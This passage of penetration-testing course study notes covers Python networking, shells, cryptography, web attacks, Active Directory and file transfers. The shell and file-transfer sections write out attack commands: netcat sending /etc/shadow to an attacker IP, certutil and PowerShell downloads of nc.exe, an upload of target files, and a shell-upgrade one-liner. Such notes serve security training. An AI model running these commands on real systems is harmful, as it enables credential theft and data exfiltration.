be modifying our script to make use of the telnetlib.interact() method,
which will allow us to interact with the server dynamically.
6. The socket.bind(address) method binds, or assigns, a specific port to
our program. In this case, we want to bind our server to the port we
defined in the port variable. The socket.listen(int) method tells the
server to listen for incoming connections and expects an integer.
7. The integer specified in socket.listen() represents the number of clients
the server will allow to connect to itself simultaneously. Once the server
is listening, it reports its status via the print function.
8. The integer specified in socket.listen() represents the number of clients
the server will allow to connect to itself simultaneously. Once the server
 is listening, it reports its status via the print function.
9. Port scanning allows us to locate open ports that are available on a
particular host. As penetration testers, we can configure our port
scanner to retrieve information about the ports, assess what services
are running on each port, and even guess which OS may be running on
the host.
10. The time.time() method returns the time at which the Python interpreter
runs the line of code it is located on.
11. socket.connect_ex() does the same thing as socket.connect(), but it
returns an error indicator upon success or failure. On connecting
successfully it returns 0.
12. Port Knocking is a means by which external users can open a gated port
on a machine by first connecting to a predetermined list of other ports in
a specific order. Think of it like entering a PIN on a mobile device: if you
input the correct numbers in the correct order, the phone will unlock.
13. It is important to note that the send() method requires a byte-like object
argument, not a string. We can use the encode() method on a variable
to convert its content to bytes, and use the decode() method to convert
bytes to a string.
14. Web Scraping is a process of sweeping information that is contained on a
webpage and extracting the information we're interested in. As
penetration testers, it is sometimes easier to retrieve the data we are
looking for by writing a script than trying to look for the data manually
from the website.
15. In a POST request, the data that is sent to the server is stored in the
request body of an HTTP request. This is in contrast to a GET request,
where data is sent directly via a URL. A common use-case for POST
requests employed by many websites are web forms, such as those used
when subscribing to a site.
16. A request header contains detailed information about the resource that is
being queried. A response header holds additional information about the
response. For example, a response header might include the location of
the server.
17. Scapy is a flexible Python-based packet manipulation program. The
purpose of using Scapy is mainly for two things: to sends packets and
receive answers.
18. A spoofed packet disguises its source IP address, so that the receiver
believes that the packet originates from a different source. Packet
spoofing can be used by attackers to misrepresent where they are, or to
impersonate other users.

Working with Shells

 1. A shell is the user interface of a system. This can either be a Command
Line Interface (CLI), which is a user interface that only allows typing,
or a Graphical User Interface (GUI), a user interface that has visual
windows and can interface with a mouse.
2. PsExec is part of the Sysinternals suite and we can use it to establish
remote Windows shells in a variety of ways. The PsTools suite is a
subset of Sysinternals and includes PsExec along with numerous other
utilities. This is not installed on Windows by default.
3. Evil-WinRM is a feature-rich tool used to establish remote shells using
Microsoft's implementation of the WS-Management protocol, WinRM.
4. MSFvenom, which is part of the Metasploit Framework developed by
Rapid7, creates payloads and manages their encoding needs. MSFvenom
is a feature-rich toolset that allows for multiple variables in the type of
format it is created in, the encoding and payload options, and the
configurations for the target and/or host machines.
5. The Framework Executable Formats are used when the custom shell is
made as a standalone program. This can be placed on the system and
executed directly. The Framework Transform Formats are used inside
the custom code that we are writing. These are not compiled or
executable, but formatted to incorporate into our source code.
6. Staged payloads begin the execution process with a small portion of the
code that doesn't contain the full payload. Instead, it initiates the
payload download from the attacking host after it begins execution. The
benefit of a staged payload is that the size of the file is smaller.
7. Stageless payloads contain the full payload from MSFvenom and do not
require any additional resources from the attacker after initial execution.
These payloads are larger when they are produced but often don't
require the use of Metasploit to obtain shell access.
8. ELF stands for Executable and Linkable Format and is the standard
format for executable files on Linux systems.
9. We start a simple HTTP server by running a Python module. We will enter
python -m SimpleHTTPServer 80 on our Kali machine.
10. To do that we need to run Python with the -c option, which will allow us
to run a command. From here we will tell Python to run a command in
single quotes. python -c 'import pty;pty.spawn("/bin/bash")' ';

Troubleshooting
Nothing to Note...

Cryptography
 1. Cryptography, from the Greek word "kryptos" (meaning concealed),
involves the concealment of information from third-parties. It involves
encoding, hashing, and encryption.
2. Entropy: The amount of unpredictability in a given ciphertext. Entropy
colloquially refers to how close the ciphertext is to ideal randomly
generated text.
3. Fundamental Theorem of Arithmetic: The mathematical statement that
every natural number greater than 1 must be either prime or a product of
unique prime factors. Forms the basis of many asymmetric cryptography
implementations.
4. Encoding is a means of converting data. Data may be converted into
another format in order to transmit it, store it, or compress it. Encoding
might also be used to describe a data structure or format, for example a
file format. Algorithms can encode and decode this data without any sort
of key.
5. Binary encoding allows us to use only a sequence of 0s and 1s to
represent far more complex data. Executable program files are
sometimes called "binary files" or "binaries" as well.
6. Most Linux distributions include the bc program, which is a calculator.
This calculator can also convert numbers between different bases.
7. Since hexadecimal appears similar to regular decimal numbers at times,
we often differentiate it by adding the prefix "0x". We can be similarly
precise with binary by using the prefix "0b", as in 0b11 and 0b110.
8. Any time we are talking about memory addresses, whether we are
developing an exploit or perhaps trying to perform a forensic
investigation, we always use hex-encoded addresses.
9. Unicode is a standard that provides a number, or unique code point, for
each character. Another way to say this is that each character is
mapped to a unique value. Unicode Transformation Format (UTF) is a
way to encode these Unicode mappings. The most common forms of UTF
are UTF-8, which uses 8 bits, or 1-byte unit, and UTF-16, which uses
16 bits, or 2-byte units.
10. Base64 works by converting every three-bytes of binary data into four
Base64 characters. Each three byte sequence is called a block. 3x8
bytes of input produces 4x6 Base64 bytes of output. Base64 encoded
strings are always longer than the original text because regular bytes
have eight bits and Base64 characters usually only have six bits of data.
11. Hashing is a transformation of variable-sized input data to a fixed-size
hexadecimal output. This output is often called a hash, or a digest. Even
the smallest change in the input data can greatly change the resulting
digest. Because of this, hashing is often used to verify the integrity of
some input data.
12. One of the common applications for hashing is calculating checksums.
Checksums are used to prove the integrity of the transmitted data. If the
checksums calculated on the sender's side are the same as the ones
calculated after the data transmission, it means that the transmitted
data are intact.
13. With respect to brute forcing, a password's strength is a function of its
length and its complexity. If we want to make a password stronger,
increasing its length usually has more defensive utility than increasing its
complexity.
14. Password hashes typically indicate which hashing algorithm produced it.
This indicator is usually a numeric value located between the first and
the second dollar sign.
15. LM and NTLM are two different hashing algorithms Windows has used to
store passwords. LM hashing is now obsolete and disabled in newer
versions of Windows. This is because it is significantly weaker than
NTLM, in that it only allows about 140 different characters in its
passwords, compared to NTLM's significantly more numerous 65536.
16. A salt is an ideally random, unique generated string. The salt is mixed
with the cleartext input (for example, appended to it), and then the
hash is calculated for the mixed string.
17. Like a physical key, a cryptographic key is (usually) a unique entity that
pairs with a specific thing that will be opened or unlocked. Keys
generally have the property of being hard to replicate assuming you do
not have the original key in your possession.
18. Symmetric-key algorithms use the same key for encrypting the plaintext
(also sometimes called cleartext) into ciphertext and for decrypting the
ciphertext back into plaintext.
19. To reproduce ROT13, we can use the built-in tr command on Kali Linux.
Tr can translate letters based on the provided parameters.
echo text to encrypt | tr 'A-Za-z' 'N-ZA-Mn-za-m'
20. Frequency analysis is the study of how often a particular character or
pattern of characters arises in a given ciphertext. Since languages tend
to abide by certain patterns (for example, the most common letter in the
English language is "e"), an attacker with sufficient ciphertext may be
able to crack a cipher simply by observing such patterns.
21. Block cipher encryption algorithms are the ones which work on blocks of
data(multiple bytes) like Blowfish uses 64bit data blocks. On the other
hand, stream ciphers operate on plaintext only one byte at a time (i.e,
each letter of the plaintext is modified independently).
22. GNU Privacy Guard (gpg) is a free and open-source command-line tool
which is a rendition of Pretty Good Privacy (PGP), which is a
cryptographic product usually used for email encryption.
23. Asymmetric cryptography, also known as public-key cryptography, is a
process that uses a pair of related keys -- one public key and one
private key -- to encrypt and decrypt a message and protect it from
unauthorized access or use.
24. There are several methods for implementing the relationship between
keys in a key-pair, but each of them hinge on a fundamental
mathematical concept: the procedure that generates the key-pairs must
be easy to compute given some input, but it must be difficult to reverse
given some output.
25. First, we select two prime numbers (designated by p and q) and then
multiply them together to form the product n. Using n as a base, we can
perform some additional math to output two special numbers e and d,
such that they have particular properties relative to n. We can then
define a public key as the tuple (n,e), and a private key as the tuple
(n,d).
26. Using asymmetric cryptography in SSH: Once we have generated a
public-private key pair using ssh-keygen, we need to send our public key
to the target using ssh-copy-id -i /public.pub target@<target-
host> . Then once our public key is saved on the target we can connect
to target using our private key as ssh -i /key.private
target@<target-host> .
27. openssl s_client is the implementation of a simple client that connects
to a server using SSL/TLS. To connect to a client using ssl we can use
the following command: openssl s_client -connect <ip:port>
28. Privacy Enhanced Mail (PEM) file or .pem is simply a list of Base64
encoded strings, usually containing multiple certificates, keys, and other
cryptographic items. Entities in a .pem are separated by lines such as
"-----BEGIN/END PRIVATE KEY-----".
29. Forward secrecy is a feature that aims to protect against session key
compromise. In short, this feature assures that past communication
cannot be decrypted if the private key gets compromised.

Web Applications
1. The Open Web Application Security Project (OWASP) is a non-profit
foundation that works on web security. Among other activities, they
publish papers, develop and contribute to open-source projects, and
organize, host, and promote security conferences.
2. Access Control refers to the restrictions of abilities and functionalities a
user is vested at a particular level of authentication. Once a user is
logged-in to a website, additional security controls must be put in place
to prevent them from executing unintended actions.
 3. Sometimes, a user may be able to carefully craft their input so that the
application interprets the text as some kind of code. When a user is able
to input and execute code in this manner, it is called an Injection
attack.
4. Cross-Site Scripting (XSS) is a particular form of injection where the
code that gets inputted by an attacker is executed within the browser of
another user. By contrast, most other injection attacks execute code on
the machine running the application rather than the client.
5. Insecure design refers to issues that occur because the design of the
application is fundamentally flawed. For example, if the application
should check for password-length when a user signs up but fails to do
so, that application can be said to have insecure design flaws.
6. Server-Side Request Forgery (SSRF) happens when a web application
tries to reach a remote server without validating the URL of the remote
server. If an attacker can control the contents of the URL, this can
allow them to force the application to make a request to a resource it
shouldn't be able to reach, including an attacker's own server.
7. In the context of web application attacks, a payload is any weaponized
request meant to poke at functionality or cause harm to the app.
However, the term payload also generally refers to the body of an HTTP
request.
8. We could edit the request in the Intercept view of Burp, but then we
would need to resubmit if we want a fresh request. Instead, we can
send this request to the Repeater to be able to modify and repeat the
request as many times as we'd like.
9. An HTTP request method tells the HTTP protocol what kind of action the
client wants to perform on a given resource or page. It's then up to the
server to determine how to interpret or handle the request.
10. URL encoding is the practice of translating unprintable characters or
characters with special meaning within URLs to a representation that is
unambiguous and universally accepted by web browsers and servers.The
urllib.parse package within Python3 provides URL encoding with the
quote() function. urllib.parse.quote('/El Niño/')
11. There are several headers that start with the letter "X", as in X-
Requested-With. This syntax is one way to represent non-standard HTTP
headers, and they often reveal interesting information about the
software used by the web application.
12. HTTP cookies are a common way to maintain state throughout a series of
HTTP requests for a particular user. It is how a client can authenticate
himself to the server and access his saved session state without sending
his username & password in each HTTP request. Cookies are randomly
generated and are used as lookup keys for server-side data.
13. It's important to note that HTML is not considered a programming
language, but a markup language, which means it describes how to
render text.
14. The Document Object Model (DOM) connects web pages to scripts or
programming languages by representing the structure of a document—
such as the HTML representing a web page—in memory. The DOM
represents a document with a logical tree. DOM methods allow
programmatic access to the tree. With them, you can change the
document's structure, style, or content.
15. JavaScript is a high-level programming language that has become one of
the fundamental components of modern web applications. All modern
browsers include a JavaScript engine that runs any client-side JavaScript
code.
16. Minification compresses JavaScript files by removing unnecessary
content, such as comments and extra white space. This process does
not change the functionality of the minified files. This is done to reduce
the file size to help them load faster.
17. Robots.txt allows us to specify files on our server that we don't want
to be crawlable. Effectively, robots.txt tells a robot whether it should
be allowed to visit certain parts of the site or not. Humans.txt is a
relatively newer convention that lists all the people who have worked on
a web site.
18. Where robots.txt primarily specifies files that should be ignored by
crawlers, sitemap.xml helps to tell search engines that the site should
be crawled. This is often used for Search Engine Optimization (SEO).
19. By contrast, many modern web applications make use of HTTP routing.
Instead of having a file living at /var/www/html/site, the application's
code would define a URL at site/ to respond with a certain resource.
Hence, to access a file we need to know its full name and the developer
can also restrict access using certain methods() only.
20. SQL is a querying language used to interface with a database. It tells the
database what data the web application wants, what kind of conditions
the data must meet, how to organize the results, and much more. The
database processes the SQL statement and determines what data
matches the statement's conditions. SQL syntax is designed to be
human-readable.
21. SELECT statements, along with WHERE clauses, make up the basics of
using SQL to extract information from a database. The JOIN and UNION
operators allow us to combine rows of data from multiple tables.
22. A primary key is a unique identifier for a row of data in a table. It can
be any type of value as long as each row in the table has a unique
 value. A foreign key is a column that references a primary key in a
different table.

Introduction to Active Directory

1. A directory is a hierarchical structure that stores information about
objects on the network. Active Directory(AD) is a Microsoft technology
used to manage computers and other devices on a network.
2. The purpose of Active Directory Domain Services (ADDS), commonly
called Active Directory, is to provide a scalable and centralized IT
management, authentication, and authorization framework.
3. The main element of Active Directory is the Domain Controller (DC). It
stores all relevant information for the Forest and provides all key
authentication and authorization services. Additionally, it also contains
all the core and native management services.
4. The first domain that you deploy in an Active Directory forest is called
the forest root domain. This domain remains the forest root domain for
the life cycle of the ADDS deployment.The forest root domain contains
the Enterprise Admins and Schema Admins groups. These service
administrator groups are used to manage forest-level operations such as
the addition and removal of domains and the implementation of changes
to the schema.
5. The main network protocol used to facilitate both authentication and
authorization in Active Directory is called Kerberos. The current Kerberos
authentication protocol, used by Microsoft, is adopted from the Kerberos
version 5 authentication protocol created by MIT.
6. The Kerberos protocol defines how clients interact with a network
authentication service. Clients obtain tickets from the Kerberos Key
Distribution Center (KDC), and they present these tickets to servers
when connections are established. Kerberos tickets represent the
client's network credentials.
7. Lightweight Directory Access Protocol(LDAP) is an open-source protocol
designed to interact with directory services. LDAP is alsy easy to
interact with from a scripting language like PowerShell.
8. Active Directory Federation Service(ADFS) provides an extended way of
offering single sign-on and authorization, while Active Directory
Certification Services(ADCS) provides an integrated certification authority
to handle the public key infrastructure.
9. Everything inside Active Directory is stored as objects. This also includes
the major elements such as users and computers. To ensure a unique
naming convention for all objects, Active Directory assigns all objects a
Security Identifier or SID.
10. In Active Directory, two major types of groups exist: Distribution groups
and Security groups. Distribution groups are only used to define email
lists and do not have any access rights or permission abilities. Security
groups on the other hand are used for exactly this purpose.
11. The notion of group membership within group membership is called nested
groups and is very commonly used in Active Directory. The power of
nested groups is its flexibility, as any user or group can be dynamically
added or removed from a group to provide the desired access.
12. Active Directory provides a solution for managing many settings through
Group Policy Objects also called GPOs. A GPO is a series of XML files that
contain settings and configurations for a multitude of applications and
options in Windows.

File Transfers
1. There are multiple ways to transfer files from a Linux target machine
such as:
i. Web-based file transfers: After you have gained shell access on target
machine you could host a Python or Apache2 web server on that machine
and download files on to your machine and vice-versa. You could also
create a custom .php on your web server to upload files from the target
machine.
ii. Netcat: nc 192.168.48.3 4444 < /etc/shadow
iii. Secure Copy: scp
offsec@192.168.50.151:/home/offsec/.bash_history
offsecHistory.txt
iv. FTP: Download: get secret.txt Upload: put exploit.sh
v. TFTP: Very trivial or basic form of FTP. By default, we can not list
files through TFTP. However, if we already know the filename, we can
download files with get or upload using put.
2. FTP connections use a command channel for commands and a data
channel for data. In a default configuration, passive mode will combine
these channels on TCP port 21 and all communication will occur in that
client-initiated session. Alternatively, an active connection uses TCP
ports 20 and 21 for the data and command channels respectively,
requiring a server-initiated connection to the client.
3. Binary and ASCII modes describe ways of transferring specific types of
files. If the file is a text file, ASCII mode will suffice. If a text file is
transferred from a UNIX system to a Microsoft system, ASCII mode will
automatically add a at the end of each newline.This ensures compatibility
with reading a text file when transferred from one type of system to
another.
 4. Binary mode will keep the file in its original state, without modifying the
newline entries. If transferring an executable, Binary mode is the best
choice. Otherwise, the execution of the binary may become corrupted
due to the modification of the new line entries.
5. Trivial File Transfer Protocol (TFTP) is a UDP-based file transfer protocol
and is often restricted by corporate egress firewall rules. During a
penetration test, we can use TFTP to transfer files from older Windows
operating systems up to Windows XP and 2003.
6. Many IoT and small form-factor networking devices will have TFTP
installed and configured for firmware updates.
7. Daemon are utility programs that run silently in the background to
monitor and take care of certain subsystems to ensure that the operating
system runs properly. A printer daemon monitors and takes care of
printing services. A network daemon monitors and maintains network
communications, and so on.
8. When accessing a Windows system, we must identify tools that exist in
the current installation that we can leverage to transfer files. The
concept of utilizing pre-existing applications is called living off the land.
9. There are multiple ways to transfer files from a Windows target machine
like:
i. certutil: Download files from host's webserver. certutil -urlcache
-split -f http://192.168.48.3/nc.exe nc.exe ii. bitsadmin: Download
file from host's webserver. Doesn't work with Python webserver.
bitsadmin /create MyDownloadExample
bitsadmin /addfile MyDownloadExample http://IP/file
C:\FULLPATH\file
bitsadmin /resume MyDownloadExample
bitsadmin /info MyDownloadExample /verbose
bitsadmin /complete MyDownloadExample
iii. Powershell: System.Net.WebClient or wget(Invoke-WebRequest)
Down: powershell.exe (New-Object
System.Net.WebClient).DownloadFile ('http://192.168.48.3/nc.exe',
'nc.exe')
Down: wget http://192.168.48.3/nc.exe -o nc.exe
Upload: powershell (New-Object System.Net.WebClient).UploadFile
('http://192.168.48.3/uploadWindows.php', '.\Secrets.jpg')
10. First, we must allow execution of PowerShell scripts (which is restricted
by default) with the -ExecutionPolicy keyword and Bypass value. Next,
we will use -NoLogo and -NonInteractive to hide the PowerShell logo
banner and suppress the interactive PowerShell prompt, respectively.
The -NoProfile keyword will prevent PowerShell from loading the default
 profile (which is not needed), and we'll specify the script file with -
File.
11. Two ways of transferring files on Windows using Powershell:
a. System.Net.WebClient
b. Invoke-WebRequest
12. We could have also made the PHP script designed for Linux target to be
able to be used on Windows with cURL but using the PowerShell
commandlet doesn't allow easy usage of the parameter in the request
and hence we use another parameterless PHP script designed for
Windows to upload files to host machine.